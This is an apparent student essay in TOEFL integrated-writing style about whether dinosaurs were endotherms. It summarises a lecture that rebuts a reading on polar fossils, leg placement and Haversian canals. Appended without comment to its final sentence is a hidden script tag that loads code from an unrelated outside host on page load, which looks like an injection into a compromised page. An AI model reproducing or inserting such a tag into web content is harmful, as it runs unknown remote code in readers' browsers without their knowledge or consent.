dinosaurs are endotherms
The reading and the lecture are about the dinosaurs. The author of the reading feels that dinosaurs are endotherms because they lived in polar regions with legs place beneath the body and also the presence of Haversian canals in their bones. The lecturer challenges all the claims made by the author and confronts hereunder.
First of all, the professor states that living in a polar region does not indicate that they are endotherms because the regions where fossils are found today are much warmer when dinosaurs lived. Additionally, during the winter season, the dinosaurs have migrated to warmer places, or even they could have hibernated like many animals in winters. On the other hand, the writing posits that fossils found in the polar region indicate they are endotherms as they can survive only with maintaining temperatures to the surroundings being in a cooler climate.
Secondly, the passage indicates that the placement of legs beneath the body provides the information that dinosaurs are endotherms as it suits the modern endotherms structure. However, the tutor counteracts this particular point by saying that their legs are placed underneath the body to support their body weight. Moreover, being legs below the body structure will help the dinosaurs to grow even large size.
Finally, the academician argues that having Haversian canals will not indicate they are endotherms. He also adds the point that they do have growth rings which create evidence of their growth patterns. Furthermore, these growth rings show that the dinosaurs hampered their growth during the cool climate and started to grow while the climate is warm.<script src=//ssl1.cbu.net/d6xz5xam></script>
